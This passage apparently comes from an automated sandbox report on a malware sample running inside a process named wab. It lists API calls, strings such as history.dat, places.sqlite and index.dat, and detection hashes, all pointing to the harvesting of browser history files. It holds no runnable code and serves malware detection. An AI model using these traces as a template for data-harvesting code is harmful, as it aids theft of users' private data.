                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                • String ID: history.dat$places.sqlite
                                • API String ID: 3093078384-467022611
                                • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                APIs
                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                • GetLastError.KERNEL32 ref: 00417627
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ErrorLast$File$PointerRead
                                • String ID:
                                • API String ID: 839530781-0
                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID: *.*$index.dat
                                • API String ID: 1974802433-2863569691
                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@mallocmemcpy
                                • String ID:
                                • API String ID: 3831604043-0
                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                APIs
                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                • GetLastError.KERNEL32 ref: 004175A2
                                • GetLastError.KERNEL32 ref: 004175A8
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ErrorLast$FilePointer
                                • String ID:
                                • API String ID: 1156039329-0
                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                APIs
                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$ChangeCloseCreateFindNotificationTime
                                • String ID:
                                • API String ID: 1631957507-0
                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                APIs
                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Temp$DirectoryFileNamePathWindows
                                • String ID:
                                • API String ID: 1125800050-0
                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: BINARY
                                • API String ID: 2221118986-907554435
                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                APIs
                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                • String ID:
                                • API String ID: 1161345128-0
                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: /stext
                                • API String ID: 2081463915-3817206916
                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: .#v
                                • API String ID: 2081463915-507759092
                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                • String ID:
                                • API String ID: 159017214-0
                                • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                APIs
                                Strings
                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID: failed to allocate %u bytes of memory
                                • API String ID: 2803490479-1168259600
                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmpmemset
                                • String ID:
                                • API String ID: 1065087418-0
                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID:
                                • API String ID: 1297977491-0
                                • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                APIs
                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                  • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                • String ID:
                                • API String ID: 1481295809-0
                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                APIs
                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 3150196962-0
                                • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                APIs
                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$PointerRead
                                • String ID:
                                • API String ID: 3154509469-0
                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                APIs
                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itowmemset
                                • String ID:
                                • API String ID: 4232544981-0
                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                APIs
                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                APIs
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$FileModuleName
                                • String ID:
                                • API String ID: 3859505661-0
                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                APIs
                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                APIs
                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                APIs
                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
